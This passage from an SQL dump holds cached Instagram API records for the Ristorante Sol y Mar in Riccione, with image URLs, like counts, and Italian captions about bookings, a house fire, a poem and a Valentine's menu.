},\"created_time\":\"1572793915\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":39},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B4aGkB7lbdW\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2019-12-21'),(8,'2019-12-13 06:24:09','2168959988818792416_8526810189','2019-12-13 06:12:08',NULL,'{\"id\":\"2168959988818792416_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=7531995557e342d671b102fbfdcc6cbd&oe=5E740A2E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/71140330_539422710154253_2959005628999474941_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=e4b205c34a4e007ed8b832efe731e4a8&oe=5EB45B9D\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/71140330_539422710154253_2959005628999474941_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=b6504813e6a6ff4670d81aa62332ad0f&oe=5E80076D\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/71140330_539422710154253_2959005628999474941_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=eabc77ee7180d15c93fb0b928b1d6a64&oe=5EB1D13A\"}},\"created_time\":\"1572780201\",\"caption\":{\"id\":\"17849143969717772\",\"text\":\"Sunday\",\"created_time\":\"1572780201\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=7531995557e342d671b102fbfdcc6cbd&oe=5E740A2E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":40},\"tags\":[],\"filter\":\"Inkwell\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B4ZsZ5BlE_g\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2019-12-13'),(9,'2019-12-23 22:45:01','2205331312130476428_8526810189','2019-12-23 22:47:01',NULL,'{\"id\":\"2205331312130476428_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=6Rbu7x00g-cAX8FZuHU&oh=3dbc1bf1bde63ddff215645b38342d5f&oe=5E9B972E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/79643930_479315256347684_6786872661109393669_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=4aK4k0k5w8IAX9LRSIj&oh=0c22e76a990f1e8e22738e39342645dd&oe=5E8F79E2\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/79643930_479315256347684_6786872661109393669_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=4aK4k0k5w8IAX9LRSIj&oh=5082240d0bcfda4c441bd76268d1a3b5&oe=5E955C12\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/79643930_479315256347684_6786872661109393669_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=4aK4k0k5w8IAX9LRSIj&oh=bc416fe657221b21c83ceae48819aec4&oe=5EA99945\"}},\"created_time\":\"1577116000\",\"caption\":{\"id\":\"18083295661192954\",\"text\":\"San Silvestro se vi va \\n\\u00c8 rimasto un solo tavolo da 6 persone .Men\\u00f9 lo trovate nella pagina di fb .Buone Feste\",\"created_time\":\"1577116000\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=6Rbu7x00g-cAX8FZuHU&oh=3dbc1bf1bde63ddff215645b38342d5f&oe=5E9B972E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":9},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B6a6STflUmM\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(10,'2019-12-23 22:45:01','2199582029682987088_8526810189','2019-12-23 22:45:01',NULL,'{\"id\":\"2199582029682987088_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=6Rbu7x00g-cAX8FZuHU&oh=3dbc1bf1bde63ddff215645b38342d5f&oe=5E9B972E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.135.1080.1080a\\/s150x150\\/80305776_1478105532327859_776504315697338582_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=xq7xTeykqUkAX-8ZsqN&oh=b7e8670479cbabdfc31d9f8824866f55&oe=5EB229D2\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/80305776_1478105532327859_776504315697338582_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=xq7xTeykqUkAX-8ZsqN&oh=acd7c8b085ec18f3e80cc89d07c5a20b&oe=5EACD1B4\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/80305776_1478105532327859_776504315697338582_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=xq7xTeykqUkAX-8ZsqN&oh=5d80db532145c213c9c0c306b8a22640&oe=5E8FA8E3\"}},\"created_time\":\"1576430632\",\"caption\":{\"id\":\"17846846293806399\",\"text\":\"Questa sera saremo chiusi\",\"created_time\":\"1576430632\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=6Rbu7x00g-cAX8FZuHU&oh=3dbc1bf1bde63ddff215645b38342d5f&oe=5E9B972E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":54},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B6GfDO9llBQ\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-01-28'),(11,'2020-01-11 23:32:37','2213792397753896237_8526810189','2020-01-11 23:34:37',NULL,'{\"id\":\"2213792397753896237_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=HUKKqAkEU1EAX-YqJiW&oh=193dcfaa9e773e1f1fdb3e212f250112&oe=5E9B972E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/80584753_181931719676375_5833654450938357131_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=28_ht0psn20AX9qodRA&oh=f2e0f6ed33b24035d395fa0c2323f3dd&oe=5EA2D0B4\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/80584753_181931719676375_5833654450938357131_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=28_ht0psn20AX9qodRA&oh=a751d9d2dde94a600ac1049f38466777&oe=5E938B44\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/80584753_181931719676375_5833654450938357131_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=28_ht0psn20AX9qodRA&oh=6d93d4b1f00fec5cdf00f3670fdb6029&oe=5ED9C113\"}},\"created_time\":\"1578124640\",\"caption\":{\"id\":\"17851559839770163\",\"text\":\"Potremmo  chiamarlo Padre &Figlio ma lo chiameremo Agrumi\",\"created_time\":\"1578124640\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=HUKKqAkEU1EAX-YqJiW&oh=193dcfaa9e773e1f1fdb3e212f250112&oe=5E9B972E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":46},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B64-HTilM0t\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(12,'2020-01-11 23:32:37','2213789742482707095_8526810189','2020-01-11 23:32:37',NULL,'{\"id\":\"2213789742482707095_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=HUKKqAkEU1EAX-YqJiW&oh=193dcfaa9e773e1f1fdb3e212f250112&oe=5E9B972E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/80839473_974726022894438_264508075261145254_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=8KUzxpPFXSUAX9SHTkd&oh=eca3703eb921e1314879658badd43762&oe=5EA1FE8B\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/80839473_974726022894438_264508075261145254_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=8KUzxpPFXSUAX9SHTkd&oh=5949ebc4f0da0fd30aed5c4a3cc37f05&oe=5EB07386\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/80839473_974726022894438_264508075261145254_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=8KUzxpPFXSUAX9SHTkd&oh=3608df61a4208a73038a59f39a1bce55&oe=5E93F46A\"}},\"created_time\":\"1578124324\",\"caption\":{\"id\":\"17845094278871735\",\"text\":\"Oggi domani ...luned\\u00ec.\",\"created_time\":\"1578124324\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=HUKKqAkEU1EAX-YqJiW&oh=193dcfaa9e773e1f1fdb3e212f250112&oe=5E9B972E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":55},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B649gqoFdKX\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(13,'2020-01-11 23:32:37','2212082557608284701_8526810189','2020-01-11 23:30:37',NULL,'{\"id\":\"2212082557608284701_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=HUKKqAkEU1EAX-YqJiW&oh=193dcfaa9e773e1f1fdb3e212f250112&oe=5E9B972E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c134.0.812.812a\\/s150x150\\/78883013_499641540676278_2319388664028671956_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=wzP1ukZLXDkAX8aLlmt&oh=6e744a59514ebabf570b977837a6e30c&oe=5E9BD03F\"},\"low_resolution\":{\"width\":320,\"height\":240,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/78883013_499641540676278_2319388664028671956_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=wzP1ukZLXDkAX8aLlmt&oh=e8c1b464f18f2718bb6c9a816e243dc9&oe=5EAB234D\"},\"standard_resolution\":{\"width\":640,\"height\":481,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/78883013_499641540676278_2319388664028671956_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=wzP1ukZLXDkAX8aLlmt&oh=874e689eaa0fed9c519318d323a431c5&oe=5EA7391A\"}},\"created_time\":\"1577920811\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":44},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B6y5V20FFId\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(14,'2020-01-24 05:15:17','2227944480518350795_8526810189','2020-01-24 05:17:17',NULL,'{\"id\":\"2227944480518350795_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=upzo8VABRaMAX-1vXTF&oh=fc96457a67d73e4d18f3a0cb11fcf16a&oe=5EC3242E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.150.1200.1200a\\/s150x150\\/81472286_822462014868751_3473905028527084039_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=IJzcXoHL8vMAX_N0NP5&oh=809b00277b51bddf5394a7231567ac87&oe=5EC01B63\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/81472286_822462014868751_3473905028527084039_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=IJzcXoHL8vMAX_N0NP5&oh=2980c4573a25302360337d4bc890d357&oe=5EC91E86\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/81472286_822462014868751_3473905028527084039_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=IJzcXoHL8vMAX_N0NP5&oh=13e7b635ac3786dbe8f13a86a3722bec&oe=5EB840D1\"}},\"created_time\":\"1579811700\",\"caption\":{\"id\":\"17846332900896198\",\"text\":\"Il Sole dentro\",\"created_time\":\"1579811700\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=upzo8VABRaMAX-1vXTF&oh=fc96457a67d73e4d18f3a0cb11fcf16a&oe=5EC3242E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":20},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B7rP7NslqfL\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(15,'2020-01-24 05:15:17','2227547648197827119_8526810189','2020-01-24 05:15:17',NULL,'{\"id\":\"2227547648197827119_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=upzo8VABRaMAX-1vXTF&oh=fc96457a67d73e4d18f3a0cb11fcf16a&oe=5EC3242E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/83100756_809378652892531_5658740241034363411_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=K6rILvu4suEAX-eOUAk&oh=c54296b701281a1ad9cd2464d6baa2db&oe=5EC9A2BA\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83100756_809378652892531_5658740241034363411_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=K6rILvu4suEAX-eOUAk&oh=25e222ee155eeae3f4536458e2126970&oe=5EDBD94A\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83100756_809378652892531_5658740241034363411_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=K6rILvu4suEAX-eOUAk&oh=8e53fd61bd13170d036134373ea2e4a9&oe=5ECAB71D\"}},\"created_time\":\"1579764394\",\"caption\":{\"id\":\"17851813270800986\",\"text\":\"Buongiorno \\nsi diciamolo ad alta voce\\nBuongiorno \\n\\u00e8 stata una settimana intensa\\n intensa di tanto ,emozioni ,lavoro amici ,riconoscimenti, riconferme presenze ,affetto \\nDomenica scorsa  incendio a casa ,forte paura ,stiamo tutti bene e quello \\u00e8 l unica  cosa che conta \\nIl resto passa ,passa tutto ,magari ci vorr\\u00e0 un po\'di tempo ma si riparte ,le cose sono cose ,oggetti si ricomperano e i ricordi andati in fumo rimarranno sempre impressi nei nostri cuori \\nL \'essenziale \\u00e8 invisibile agli occhi \\nGrazie agli Angeli che ci hanno protetto ,grazie alle nostre famiglie ,grazie agli Amici quelli che ci hanno teso una mano e ...offerto dei posto letto \\ud83d\\ude48siamo tanti in famiglia \\ud83d\\ude1c hanno rischiato che accettassimo (Katia e Romi )\\n Grazie Sigep  Grazie per la ventata di dolcezza \\nGrazie per le presenze che richiami \\ni \\\"paesi \\\"che porti fin qui a casa nostra  spagna ,francia ,emirati ,israele ,belgio ..states \\nGrazie Ernst Knam\\ud83d\\udc9f la tua dolcezza e Amicizia supera il tuo Nome \\ngrazie  Artebianca & friends\\ud83d\\udc9f ,grazie Corman ,Grazie Marchesini \\ud83d\\udc9f,grazie Ottavio \\ud83d\\udc9fanni e anni di presenze \\nGrazie  Lopez ,Hellmat ,Novacart ,Kre ,Marino,Rizzo Ajaha .... e tanti tantissimi Altri \\ud83d\\ude4c\\n3ristoranti non sarebbero bastati \\ud83d\\ude4csar\\u00e1 per questo che \\\"vogliono\\\" toglierci anche questo\\ud83d\\ude48\\ud83e\\udd22?!\\nin caso  Qui e ora :grazie grazie a tutti davvero di cuore \\nBarbara ,Teo & Sons \\u2764#hope#,grateful#passion#sigep#staytuned\",\"created_time\":\"1579764394\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=upzo8VABRaMAX-1vXTF&oh=fc96457a67d73e4d18f3a0cb11fcf16a&oe=5EC3242E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":27},\"tags\":[\"hope\",\"passion\",\"sigep\",\"staytuned\"],\"filter\":\"Normal\",\"comments\":{\"count\":1},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B7p1sizFpov\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(16,'2020-02-05 21:47:55','2232917189568274659_8526810189','2020-02-05 21:49:55',NULL,'{\"id\":\"2232917189568274659_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AfLgjzGqXLYAX9waSy0&oh=f33f3c6bae2ddacceb75788de951fd19&oe=5EC3242E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.62.500.500a\\/s150x150\\/83881467_257296865250971_1484203285355129702_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=B5k7fZjOSqcAX-KIIYi&oh=f406951e839a67100481527444e6dd14&oe=5ED87980\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/83881467_257296865250971_1484203285355129702_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=B5k7fZjOSqcAX-KIIYi&oh=9f72cce49ba664be4f0e54419043e960&oe=5EB9B551\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/83881467_257296865250971_1484203285355129702_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=B5k7fZjOSqcAX-KIIYi&oh=2571e05d126d1d434a71bf0959044ff6&oe=5ECFF9F0\"}},\"created_time\":\"1580404493\",\"caption\":{\"id\":\"17859822991704595\",\"text\":\"Insisti\\nnon demordere\\nSii la spina nel fianco\\nla goccia sulla roccia\\nla forza che abbraccia\\nil laccio\\nl\'ortica\\nil bacio\\nSii sempre l\'esempio\\ne mai l\'incostanza\\nsii come la danza\\nche fugge e ritorna\\ne mai se ne va\\ndall\'anima sua\\ne dalla sua forma.\\n\\nFlavio Cante Skuye - da \\u201cI Rumori dell\\u2019Anima\\u201dsolymarrevolution\\n\\nDipinto di Alaya Gadeh\",\"created_time\":\"1580404493\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AfLgjzGqXLYAX9waSy0&oh=f33f3c6bae2ddacceb75788de951fd19&oe=5EC3242E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":22},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B786lp5FKDj\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-12'),(17,'2020-02-05 21:47:55','2232906806409544074_8526810189','2020-02-05 21:47:55',NULL,'{\"id\":\"2232906806409544074_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AfLgjzGqXLYAX9waSy0&oh=f33f3c6bae2ddacceb75788de951fd19&oe=5EC3242E\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.716.716a\\/s150x150\\/82449405_483667409012406_5172385299077456086_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=0la8PWWbuaAAX908d8-&oh=f4fbcc84ec0593556a907b7364319560&oe=5EDAA62B\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/82449405_483667409012406_5172385299077456086_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=0la8PWWbuaAAX908d8-&oh=262411ed5bd10d61e9fd48c83f9a0ed1&oe=5ECC30A0\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/82449405_483667409012406_5172385299077456086_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=0la8PWWbuaAAX908d8-&oh=1cd57c9cef36a38e7a939c1659409da5&oe=5EC80CF7\"}},\"created_time\":\"1580403255\",\"caption\":{\"id\":\"17870499010578897\",\"text\":\"La vita ha due doni preziosi: la bellezza e la verit\\u00e0. La prima l\\u2019ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\\n(Khalil Gibran)\\n\\nMen\\u00f9 week end di San Valentino \\nSan Valentino e Cena  del 15 -2 \\ud83d\\udc9fEntr\\u00e9e di Benvenuto\\n\\ud83d\\udc9fCarpaccio di Mazzancolle  nostrane ,campari ,arancio e kefir \\ud83d\\udc9fNoci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\\n\\ud83d\\udc9fCalamaro  puntarelle e Alici del Cantambrico \\ud83d\\udc9fTortelli di patate e burrata sl rag\\u00f9 di Astice e pomodorini\\n\\ud83d\\udc9fRoll\\u00e9 di Sogliola nostrana al tartufo su patata fondente \\ud83d\\udc9f\\ud83c\\udf70Cioccolato bianco  lampone e liquirizia \\ud83d\\udc9fcaff\\u00e8 e piccolo saluto \\u20ac 55a persona bevande escluse \\nPrenotazione con caparra( obbligatoria ) \\nwww.ristorantesolymar.it \\nps: 16-2 chiuderemo dopo 25 anni e 11 mesi di lavoro \\nchiuderemo per.... lavori 